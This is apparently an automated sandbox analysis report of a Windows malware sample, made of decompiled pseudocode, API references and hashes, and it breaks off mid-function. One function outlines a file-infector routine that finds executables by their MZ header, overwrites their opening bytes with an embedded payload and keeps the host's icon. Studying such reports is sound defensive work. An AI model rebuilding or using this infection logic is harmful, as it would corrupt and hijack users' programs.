                                                                          control_flow_graph 0 406638-406663 1 406665 0->1 2 406668-40667f call 40598c 0->2 1->2 5 406685-4066c7 call 40456c call 405fd8 * 2 2->5 6 406b1c-406b25 2->6 13 406877-40687e 5->13 14 4066cd-4066d4 5->14 15 406884-406892 13->15 16 406aeb-406b10 call 404520 * 3 13->16 17 4066d7-4066e7 14->17 18 406895-4068a5 15->18 19 4066f3-406713 GetObjectA 17->19 20 4066e9-4066ed 17->20 22 4068b1-4068ed GetObjectA call 402660 18->22 23 4068a7-4068ab 18->23 25 406724-40673d call 402660 19->25 26 406715-40671f GetObjectA 19->26 20->13 20->19 33 4068f6-406912 call 40465c 22->33 34 4068ef-4068f3 22->34 23->16 23->22 36 406748-40675c CopyImage call 4061e0 25->36 37 40673f-406743 25->37 26->25 48 406923-40695c call 4065cc call 406624 call 40598c 33->48 49 406914-40691f call 406580 33->49 34->33 45 406761-406796 call 402660 call 406154 GetObjectA 36->45 40 406801-406858 call 4045e8 call 4065cc call 406598 call 406624 call 40598c 37->40 90 406864-406871 40->90 91 40685a-40685f call 402bec 40->91 62 4067b1-4067c5 45->62 63 406798-40679d 45->63 75 406968-40696a 48->75 76 40695e-406963 call 402bec 48->76 49->48 67 4067d7-4067dd 62->67 68 4067c7-4067d5 call 406218 62->68 63->62 66 40679f-4067af 63->66 66->40 73 4067ef-4067fd call 406218 67->73 74 4067df-4067ed call 406218 67->74 68->40 73->40 74->40 83 406970-40698d CopyImage call 4061e0 75->83 84 4069f4-406a12 CopyImage call 4061e0 call 406218 75->84 76->6 96 4069a0-4069a3 83->96 97 40698f 83->97 101 406a17-406a1e 84->101 90->13 90->17 91->6 99 4069a5-4069a8 96->99 100 4069dc-4069e6 call 406218 96->100 102 4069d0-4069da call 406218 97->102 103 406991-406992 97->103 105 4069e8-4069f2 call 406218 99->105 106 4069aa 99->106 100->101 107 406a20-406a47 call 40598c 101->107 108 406a89-406ad2 CopyImage call 4061e0 call 406218 call 406624 call 40598c call 406624 101->108 102->101 110 406994-406997 103->110 111 4069ac-4069b6 call 406218 103->111 105->101 106->101 129 406a53-406a7d call 4065cc call 40598c call 4065cc 107->129 130 406a49-406a4e call 402bec 107->130 149 406ad4-406ad9 call 402bec 108->149 150 406adb-406ae5 108->150 118 4069b8-4069c2 call 406218 110->118 119 406999-40699c 110->119 111->101 118->101 120 4069c4-4069ce call 406218 119->120 121 40699e 119->121 120->101 121->101 129->108 148 406a7f-406a84 call 402bec 129->148 130->6 148->6 149->6 150->16 150->18
                                                                          C-Code - Quality: 78%
                                                                          			E00406638(void** __eax, intOrPtr __ecx, unsigned int __edx) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				short _v14;
                                                                          				char _v17;
                                                                          				signed int _v18;
                                                                          				char _v19;
                                                                          				int _v20;
                                                                          				void** _v24;
                                                                          				unsigned int _v28;
                                                                          				intOrPtr _v32;
                                                                          				char _v33;
                                                                          				int _v40;
                                                                          				intOrPtr _v44;
                                                                          				void* _v48;
                                                                          				intOrPtr _v52;
                                                                          				intOrPtr _v56;
                                                                          				signed short _v58;
                                                                          				short _v60;
                                                                          				short _v62;
                                                                          				intOrPtr _v68;
                                                                          				void* _v72;
                                                                          				void** _v76;
                                                                          				void** _v80;
                                                                          				intOrPtr _v100;
                                                                          				signed short _v106;
                                                                          				short _v108;
                                                                          				int _v112;
                                                                          				int _v116;
                                                                          				char _v120;
                                                                          				short _v126;
                                                                          				intOrPtr _v128;
                                                                          				int _v136;
                                                                          				int _v140;
                                                                          				void _v144;
                                                                          				void* __ebp;
                                                                          				signed int _t138;
                                                                          				signed int _t139;
                                                                          				void* _t141;
                                                                          				unsigned int _t152;
                                                                          				void* _t154;
                                                                          				void* _t162;
                                                                          				void* _t179;
                                                                          				void* _t181;
                                                                          				void* _t199;
                                                                          				void* _t201;
                                                                          				void* _t207;
                                                                          				void* _t212;
                                                                          				void* _t214;
                                                                          				signed int _t220;
                                                                          				void* _t221;
                                                                          				void* _t229;
                                                                          				void* _t232;
                                                                          				void* _t243;
                                                                          				void* _t255;
                                                                          				intOrPtr _t264;
                                                                          				void* _t274;
                                                                          				void* _t275;
                                                                          				int _t293;
                                                                          				int _t294;
                                                                          				intOrPtr _t318;
                                                                          				void* _t324;
                                                                          				void* _t366;
                                                                          				void* _t369;
                                                                          				int _t375;
                                                                          				int _t376;
                                                                          				void* _t378;
                                                                          				void* _t380;
                                                                          				intOrPtr _t381;
                                                                          
                                                                          				_t378 = _t380;
                                                                          				_t381 = _t380 + 0xffffff74;
                                                                          				_v32 = __ecx;
                                                                          				_v28 = __edx;
                                                                          				_v24 = __eax;
                                                                          				_v33 = 0;
                                                                          				_v62 = 0;
                                                                          				_v60 = 1;
                                                                          				_t138 = _v28 + 1;
                                                                          				_t139 = _t138 >> 1;
                                                                          				if(_t138 < 0) {
                                                                          					asm("adc eax, 0x0");
                                                                          				}
                                                                          				_v58 = _t139;
                                                                          				_t141 = E0040598C(_v32);
                                                                          				_t384 = _t141 - 6;
                                                                          				if(_t141 != 6) {
                                                                          					L59:
                                                                          					return _v33;
                                                                          				} else {
                                                                          					_v44 = ((_v58 & 0x0000ffff) << 4) + 6;
                                                                          					_v68 = E0040456C();
                                                                          					_v52 = E00405FD8(0, 0, _t384);
                                                                          					_v56 = E00405FD8(0, 0, _t384);
                                                                          					_push(_t378);
                                                                          					_push(0x406b11);
                                                                          					_push( *[fs:ecx]);
                                                                          					 *[fs:ecx] = _t381;
                                                                          					_t152 = _v28 >> 1;
                                                                          					if(_t152 < 0) {
                                                                          						L22:
                                                                          						_t154 = _v28 >> 1;
                                                                          						__eflags = _t154;
                                                                          						if(_t154 < 0) {
                                                                          							L57:
                                                                          							__eflags = 0;
                                                                          							_pop(_t318);
                                                                          							 *[fs:eax] = _t318;
                                                                          							_push(E00406B18);
                                                                          							E00404520(_v68);
                                                                          							E00404520(_v52);
                                                                          							return E00404520(_v56);
                                                                          						} else {
                                                                          							_t162 = _t154 + 1;
                                                                          							__eflags = _t162;
                                                                          							_v72 = _t162;
                                                                          							_v40 = 0;
                                                                          							_v80 = _v24;
                                                                          							do {
                                                                          								_t366 =  *_v80;
                                                                          								_v48 = _v80[1];
                                                                          								__eflags = _t366;
                                                                          								if(_t366 != 0) {
                                                                          									L26:
                                                                          									GetObjectA(_v48, 0x18,  &_v144); // 0x18 == sizeof(BITMAP): read the handle's geometry into _v144
                                                                          									_t293 = _v140; // BITMAP.bmWidth
                                                                          									_t375 = _v136; // BITMAP.bmHeight
                                                                          									E00402660( &_v120, 0x28); // called on the 0x28-byte area that is filled in below as a BITMAPINFOHEADER
                                                                          									_v120 = 0x28; // biSize == sizeof(BITMAPINFOHEADER)
                                                                          									_v116 = _t293; // biWidth
                                                                          									_v112 = _t375; // biHeight
                                                                          									__eflags = _t366;
                                                                          									if(_t366 != 0) {
                                                                          										_t243 = _t293 + _t293; // when the first handle is non-zero biHeight becomes twice biWidth
                                                                          										__eflags = _t243;
                                                                          										_v112 = _t243;
                                                                          									}
                                                                          									_v108 = 1; // biPlanes
                                                                          									_v18 = E0040465C(_v68, _v40);
                                                                          									__eflags = _v14;
                                                                          									if(_v14 == 0) {
                                                                          										_v14 = E00406580(_v18 & 0x0000ffff);
                                                                          									}
                                                                          									_v106 = _v14; // biBitCount; the switch below maps it to a pixel-format code
                                                                          									_push(E004065CC(_t293, _t375, _t378) + 0x28);
                                                                          									_t179 = E00406624(_t293, _t375);
                                                                          									_pop(_t324);
                                                                          									_v100 = _t324 + _t179;
                                                                          									_t181 = E0040598C(_v32);
                                                                          									__eflags = _t181 - 0x28;
                                                                          									if(_t181 == 0x28) {
                                                                          										__eflags = _t366;
                                                                          										if(__eflags == 0) {
                                                                          											E004061E0(_v52, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
                                                                          											E00406218(_v52, 0x28, 1, _t378, __eflags);
                                                                          										} else {
                                                                          											E004061E0(_v52, CopyImage(_t366, 0, _t293, _t375, 0), __eflags);
                                                                          											_t220 = _v106 & 0x0000ffff;
                                                                          											__eflags = _t220 - 0x10;
                                                                          											if(__eflags > 0) {
                                                                          												_t221 = _t220 - 0x18;
                                                                          												__eflags = _t221;
                                                                          												if(__eflags == 0) {
                                                                          													E00406218(_v52, 0x28, 6, _t378, __eflags);
                                                                          												} else {
                                                                          													__eflags = _t221 - 8;
                                                                          													if(__eflags == 0) {
                                                                          														E00406218(_v52, 0x28, 7, _t378, __eflags);
                                                                          													}
                                                                          												}
                                                                          											} else {
                                                                          												if(__eflags == 0) {
                                                                          													E00406218(_v52, 0x28, 5, _t378, __eflags);
                                                                          												} else {
                                                                          													_t229 = _t220 - 1;
                                                                          													__eflags = _t229;
                                                                          													if(__eflags == 0) {
                                                                          														E00406218(_v52, 0x28, 1, _t378, __eflags);
                                                                          													} else {
                                                                          														_t232 = _t229 - 3;
                                                                          														__eflags = _t232;
                                                                          														if(__eflags == 0) {
                                                                          															E00406218(_v52, 0x28, 2, _t378, __eflags);
                                                                          														} else {
                                                                          															__eflags = _t232 - 4;
                                                                          															if(__eflags == 0) {
                                                                          																E00406218(_v52, 0x28, 3, _t378, __eflags);
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										__eflags =  *(_v52 + 0x41);
                                                                          										if(__eflags == 0) {
                                                                          											L54:
                                                                          											E004061E0(_v56, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
                                                                          											E00406218(_v56, 0x28, 1, _t378, __eflags);
                                                                          											E00406624(_t293, _t375);
                                                                          											_t199 = E0040598C(_v32);
                                                                          											_t201 = E00406624(_t293, _t375);
                                                                          											__eflags = _t199 - _t201;
                                                                          											if(_t199 == _t201) {
                                                                          												goto L56;
                                                                          											} else {
                                                                          												E00402BEC();
                                                                          												goto L59;
                                                                          											}
                                                                          										} else {
                                                                          											_t207 = E0040598C(_v32);
                                                                          											__eflags = _t207 - (_v18 & 0x0000ffff) << 2;
                                                                          											if(_t207 == (_v18 & 0x0000ffff) << 2) {
                                                                          												E004065CC(_t293, _t375, _t378);
                                                                          												_t212 = E0040598C(_v32);
                                                                          												_t214 = E004065CC(_t293, _t375, _t378);
                                                                          												_pop(0x28);
                                                                          												__eflags = _t212 - _t214;
                                                                          												if(__eflags == 0) {
                                                                          													goto L54;
                                                                          												} else {
                                                                          													E00402BEC();
                                                                          													goto L59;
                                                                          												}
                                                                          											} else {
                                                                          												E00402BEC();
                                                                          												goto L59;
                                                                          											}
                                                                          										}
                                                                          									} else {
                                                                          										E00402BEC();
                                                                          										goto L59;
                                                                          									}
                                                                          								} else {
                                                                          									__eflags = _v48;
                                                                          									if(_v48 == 0) {
                                                                          										goto L57;
                                                                          									} else {
                                                                          										goto L26;
                                                                          									}
                                                                          								}
                                                                          								goto L60;
                                                                          								L56:
                                                                          								_v40 = _v40 + 1;
                                                                          								_v80 =  &(_v80[2]);
                                                                          								_t130 =  &_v72;
                                                                          								 *_t130 = _v72 - 1;
                                                                          								__eflags =  *_t130;
                                                                          							} while ( *_t130 != 0);
                                                                          							goto L57;
                                                                          						}
                                                                          					} else {
                                                                          						_v72 = _t152 + 1;
                                                                          						_v76 = _v24;
                                                                          						while(1) {
                                                                          							_t369 =  *_v76;
                                                                          							_v48 = _v76[1];
                                                                          							if(_t369 == 0 && _v48 == 0) {
                                                                          								goto L22;
                                                                          							}
                                                                          							GetObjectA(_v48, 0x18,  &_v144); // 0x18 == sizeof(BITMAP): fills a BITMAP struct for the HBITMAP in _v48
                                                                          							_t294 = _v140;
                                                                          							_t376 = _v136;
                                                                          							if(_t369 != 0) {
                                                                          								GetObjectA(_t369, 0x18,  &_v144);
                                                                          							}
                                                                          							E00402660( &_v20, 0x10);
                                                                          							_v20 = _t294;
                                                                          							_v19 = _t376;
                                                                          							if(_t369 != 0) {
                                                                          								_t255 = CopyImage(_t369, 0, _t294, _t376, 0x2000); // executed; 0 == IMAGE_BITMAP, 0x2000 == LR_CREATEDIBSECTION
                                                                          								E004061E0(_v52, _t255, __eflags);
                                                                          								E00402660( &_v120, 0x28); // clears a 0x28-byte buffer; 0x28 == sizeof(BITMAPINFOHEADER)
                                                                          								_v120 = 0x28; // first dword set to the struct size, the biSize idiom of BITMAPINFOHEADER
                                                                          								GetObjectA(E00406154(_v52, __eflags), 0x18,  &_v144);
                                                                          								_t264 = _v128;
                                                                          								__eflags = _t264 - 1;
                                                                          								if(_t264 != 1) {
                                                                          									L14:
                                                                          									_t310 = _v126;
                                                                          									__eflags = 1 - 0x10;
                                                                          									if(1 >= 0x10) {
                                                                          										__eflags = 1 - 0x100;
                                                                          										if(1 >= 0x100) {
                                                                          											E00406218(_v52, _t310, 3, _t378, 1 - 0x100);
                                                                          											_v18 = 0;
                                                                          											_v17 = 1;
                                                                          										} else {
                                                                          											E00406218(_v52, _t310, 2, _t378, 1 - 0x100);
                                                                          											_v18 = 0x10;
                                                                          										}
                                                                          									} else {
                                                                          										E00406218(_v52, _t310, 1, _t378, 1 - 0x10);
                                                                          										_v18 = 2;
                                                                          									}
                                                                          								} else {
                                                                          									__eflags = _v126 - 0xf;
                                                                          									if(_v126 < 0xf) {
                                                                          										goto L14;
                                                                          									} else {
                                                                          										_v18 = 0;
                                                                          										_v17 = 0;
                                                                          										_v14 = _v126;
                                                                          									}
                                                                          								}
                                                                          							} else {
                                                                          								_v18 = 2;
                                                                          							}
                                                                          							E004045E8(_v68, 0xbadbad);
                                                                          							_t274 = E004065CC(_t294, _t376, _t378);
                                                                          							_t275 = E00406598(_t378);
                                                                          							_v12 = _t274 + _t275 + 0x28 + E00406624(_t294, _t376);
                                                                          							_v8 = _v44;
                                                                          							if(E0040598C(_v32) == 0x10) {
                                                                          								_v44 = _v44 + _v12;
                                                                          								_v76 =  &(_v76[2]);
                                                                          								_t66 =  &_v72;
                                                                          								 *_t66 = _v72 - 1;
                                                                          								__eflags =  *_t66;
                                                                          								if( *_t66 != 0) {
                                                                          									continue;
                                                                          								} else {
                                                                          									goto L22;
                                                                          								}
                                                                          							} else {
                                                                          								E00402BEC();
                                                                          								goto L59;
                                                                          							}
                                                                          							goto L60;
                                                                          						}
                                                                          						goto L22;
                                                                          					}
                                                                          				}
                                                                          				L60:
                                                                          			}

                                                                          (Instruction-address column for this function, detached from its decompiled lines during extraction: the function's code spans 0x00406639 through 0x00406b25; the per-line mapping cannot be recovered here.)

                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406700
                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040671F
                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00406789
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004068BE
                                                                          • CopyImage.USER32(00000000,00000000,?,?,00000000), ref: 00406977
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 004069FE
                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00406752
                                                                            • Part of subcall function 004061E0: GetObjectA.GDI32(00000000,00000018), ref: 004061F2
                                                                            • Part of subcall function 00406154: 72E7AC50.USER32(00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00406177
                                                                            • Part of subcall function 00406154: 72E7A7A0.GDI32(00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000), ref: 00406192
                                                                            • Part of subcall function 00406154: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000), ref: 0040619D
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00406A93
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$CopyImage$B380
                                                                          • String ID: (
                                                                          • API String ID: 1117845954-3887548279
                                                                          • Opcode ID: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                          • Instruction ID: 8b23a46e2d3205504fa6020bfc4f244d26e515b74d7163ba5290a0ebff7405a2
                                                                          • Opcode Fuzzy Hash: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                          • Instruction Fuzzy Hash: 37E16170A002189BDB10EBA9D885AAEB7F5AF49304F11807BF405FB3C1DA3D9D55CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 83%
                                                                          			E004071D0(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                          				char _v8;
                                                                          				char _v9;
                                                                          				char _v16;
                                                                          				char _v40254;
                                                                          				char _v41487;
                                                                          				char _v41488;
                                                                          				char _v41492;
                                                                          				char _v41496;
                                                                          				char _v41500;
                                                                          				char _v41504;
                                                                          				void* _t45;
                                                                          				void* _t80;
                                                                          				void* _t82;
                                                                          				long _t85;
                                                                          				CHAR* _t130;
                                                                          				intOrPtr _t150;
                                                                          				void* _t154;
                                                                          				void* _t155;
                                                                          				long _t173;
                                                                          				void* _t177;
                                                                          				void* _t178;
                                                                          
                                                                          				_t128 = __ebx;
                                                                          				_t177 = _t178;
                                                                          				_push(__eax);
                                                                          				_t45 = 0xa;
                                                                          				goto L1;
                                                                          				L17:
                                                                          				_pop(_t150);
                                                                          				 *[fs:eax] = _t150;
                                                                          				_push(E00407493);
                                                                          				E004030B8( &_v41504, 4);
                                                                          				return E00403094( &_v8);
                                                                          				L1:
                                                                          				_t178 = _t178 + 0xfffff004;
                                                                          				_push(_t45);
                                                                          				_t45 = _t45 - 1;
                                                                          				_t180 = _t45;
                                                                          				if(_t45 != 0) {
                                                                          					goto L1;
                                                                          				} else {
                                                                          					_push(__ebx);
                                                                          					_v41504 = 0;
                                                                          					_v41500 = 0;
                                                                          					_v41496 = 0;
                                                                          					_v41492 = 0;
                                                                          					E004033FC(_v8);
                                                                          					_push(_t177);
                                                                          					_push(0x40748c);
                                                                          					_push( *[fs:eax]);
                                                                          					 *[fs:eax] = _t178 + 0xfffffde8;
                                                                          					_v9 = 0;
                                                                          					E004031F4( &_v41492, 3, 0x4091c0);
                                                                          					if(E00406FE4(_v8, __ebx, _v41492, _t180) != 0) {
                                                                          						E00404F34(_v8,  &_v41496);
                                                                          						E0040312C( &_v8, _v41496);
                                                                          						E00404F90( &_v41500, _t128, 3);
                                                                          						_push(E0040340C(_v41500));
                                                                          						_t129 = E0040340C(_v8);
                                                                          						_pop(_t154);
                                                                          						if(E00404B38(_t68, _t154) == 0) {
                                                                          							E00405008( &_v41504, _t129, 3);
                                                                          							_t155 = E0040340C(_v41504);
                                                                          							if(E00404B38(_t129, _t155) == 0 && E004034EC("\\PROGRA~1\\", _v8) != 3) {
                                                                          								_t80 = E00404F6C(_v8);
                                                                          								if(_t80 > 0xa200 && _t80 <= 0x989680) {
                                                                          									_t82 = E00407130(_v8, _t129); // executed
                                                                          									if(_t82 == 0) {
                                                                          										_v9 = 1;
                                                                          										_t130 = E0040340C(_v8);
                                                                          										_t85 = GetFileAttributesA(_t130); // executed
                                                                          										_t173 = _t85;
                                                                          										if((_t173 & 0x00000001) > 0) {
                                                                          											SetFileAttributesA(_t130, 0);
                                                                          										}
                                                                          										_t131 = E00405BDC();
                                                                          										_t175 = E004064CC();
                                                                          										E00406CA8(_t87, 0, _v8);
                                                                          										E00406510(_t175, _t86);
                                                                          										E00405974();
                                                                          										E00404198();
                                                                          										E00405988(_t131);
                                                                          										E00404520(_t131);
                                                                          										E00404520(_t175);
                                                                          										_t132 = E00404B68(_v8, 0xc0000303);
                                                                          										if(_t103 != 0xffffffff) {
                                                                          											E00404BC4(_t132, 2,  &_v41488);
                                                                          											if(_v41488 == 0x4d && _v41487 == 0x5a) {
                                                                          												E00404BB4(_t132, 0, 0);
                                                                          												E00404BC4(_t132, 0xa200,  &_v41488);
                                                                          												E0040254C( &_v40254, 4,  &_v16);
                                                                          												E00407080( &_v41488, _v16, 0x3e8);
                                                                          												E00404BB4(_t132, 0, 0);
                                                                          												E00404BE0(_t132, 0xa200, 0x40a698);
                                                                          												E00404BB4(_t132, 2, 0);
                                                                          												E00404BE0(_t132, 0xa200,  &_v41488);
                                                                          											}
                                                                          										}
                                                                          										E00404B90(_t132);
                                                                          										if((_t173 & 0x00000001) > 0) {
                                                                          											SetFileAttributesA(E0040340C(_v8), _t173);
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					goto L17;
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407461
                                                                            • Part of subcall function 00404BC4: ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                            • Part of subcall function 00404BB4: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                          • API String ID: 997383822-4093836345
                                                                          • Opcode ID: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                                          • Instruction ID: 377d96c4788612fdddee84976f6eb16641268004b287eb3b442383de46351668
                                                                          • Opcode Fuzzy Hash: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                                          • Instruction Fuzzy Hash: 71514370B042045BDB10FB6ACC82A8EB7A59F85308F1085BBB504B73D3DA7DEF454A5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 68%
                                                                          			E00401788() {
                                                                          				void* _t11;
                                                                          				signed int _t13;
                                                                          				intOrPtr _t19;
                                                                          				void* _t20;
                                                                          				intOrPtr _t23;
                                                                          
                                                                          				_push(_t23);
                                                                          				_push(E0040183E);
                                                                          				_push( *[fs:edx]);
                                                                          				 *[fs:edx] = _t23;
                                                                          				_push(0x40a5b4);
                                                                          				L004010DC();
                                                                          				if( *0x40a035 != 0) {
                                                                          					_push(0x40a5b4);
                                                                          					L004010E4();
                                                                          				}
                                                                          				E0040114C(0x40a5d4);
                                                                          				E0040114C(0x40a5e4);
                                                                          				E0040114C(0x40a610);
                                                                          				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                          				 *0x40a60c = _t11;
                                                                          				if( *0x40a60c != 0) {
                                                                          					_t13 = 3;
                                                                          					do {
                                                                          						_t20 =  *0x40a60c; // 0x640868
                                                                          						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                          						_t13 = _t13 + 1;
                                                                          					} while (_t13 != 0x401);
                                                                          					 *((intOrPtr*)(0x40a5f8)) = 0x40a5f4;
                                                                          					 *0x40a5f4 = 0x40a5f4;
                                                                          					 *0x40a600 = 0x40a5f4;
                                                                          					 *0x40a5ac = 1;
                                                                          				}
                                                                          				_pop(_t19);
                                                                          				 *[fs:eax] = _t19;
                                                                          				_push(0x401845);
                                                                          				if( *0x40a035 != 0) {
                                                                          					_push(0x40a5b4);
                                                                          					L004010EC();
                                                                          					return 0;
                                                                          				}
                                                                          				return 0;
                                                                          			}

                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID:
                                                                          • API String ID: 730355536-0
                                                                          • Opcode ID: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                          • Instruction ID: b00ea9f5082304a52c30b3310984ccb38099dd734a88c9f27aa2559637ee1f83
                                                                          • Opcode Fuzzy Hash: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                          • Instruction Fuzzy Hash: 400184B0604380AEE715AF6A9D06B167BA4E749704F04C53FA140B66F2CA7D44A0CB5F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 89%
                                                                          			E00406B48(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                          				intOrPtr* _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				signed int _v20;
                                                                          				intOrPtr _v24;
                                                                          				char _v28;
                                                                          				struct _ICONINFO _v48;
                                                                          				void* _t65;
                                                                          				void* _t72;
                                                                          				signed int _t81;
                                                                          				intOrPtr* _t82;
                                                                          				intOrPtr* _t85;
                                                                          				void* _t98;
                                                                          				void* _t99;
                                                                          				intOrPtr _t103;
                                                                          				intOrPtr _t104;
                                                                          				signed int _t111;
                                                                          				intOrPtr* _t112;
                                                                          				intOrPtr _t116;
                                                                          				intOrPtr _t117;
                                                                          				void* _t118;
                                                                          				void* _t119;
                                                                          				void* _t120;
                                                                          				void* _t121;
                                                                          				void* _t124;
                                                                          
                                                                          				_v28 = 0;
                                                                          				_v16 = __ecx;
                                                                          				_v12 = __edx;
                                                                          				_v8 = __eax;
                                                                          				_push(_t124);
                                                                          				_push(0x406c97);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t124 + 0xffffffd4;
                                                                          				_t116 = _v12;
                                                                          				if(_t116 < 0) {
                                                                          					L8:
                                                                          					_v24 = E00405968();
                                                                          					_push(_v12 + 1 + _v12 + 1);
                                                                          					E00403B24();
                                                                          					_t117 = _v12;
                                                                          					if(_t117 >= 0) {
                                                                          						_t120 = _t117 + 1;
                                                                          						_v20 = 0;
                                                                          						_t85 = _v8;
                                                                          						do {
                                                                          							GetIconInfo( *( *_t85 + 0x1c),  &_v48);
                                                                          							_t81 = _v20 + _v20;
                                                                          							 *((intOrPtr*)(_v28 + _t81 * 4)) = _v48.hbmColor;
                                                                          							 *((intOrPtr*)(_v28 + 4 + _t81 * 4)) = _v48.hbmMask;
                                                                          							_v20 = _v20 + 1;
                                                                          							_t85 = _t85 + 4;
                                                                          							_t120 = _t120 - 1;
                                                                          						} while (_t120 != 0);
                                                                          					}
                                                                          					_t65 = E00406638(_v28, _v16, E00403970()); // executed
                                                                          					if(_t65 == 0) {
                                                                          						E00405990(_v16);
                                                                          					}
                                                                          					_t118 = E00403970();
                                                                          					if(_t118 >= 0) {
                                                                          						_t119 = _t118 + 1;
                                                                          						_v20 = 0;
                                                                          						do {
                                                                          							_t72 =  *(_v28 + _v20 * 4);
                                                                          							if(_t72 != 0) {
                                                                          								DeleteObject(_t72);
                                                                          							}
                                                                          							_v20 = _v20 + 1;
                                                                          							_t119 = _t119 - 1;
                                                                          						} while (_t119 != 0);
                                                                          					}
                                                                          				} else {
                                                                          					_t121 = _t116 + 1;
                                                                          					_v20 = 0;
                                                                          					_t82 = _v8;
                                                                          					while( *((intOrPtr*)( *_t82 + 0x1c)) != 0) {
                                                                          						_t111 = _v20 + 1;
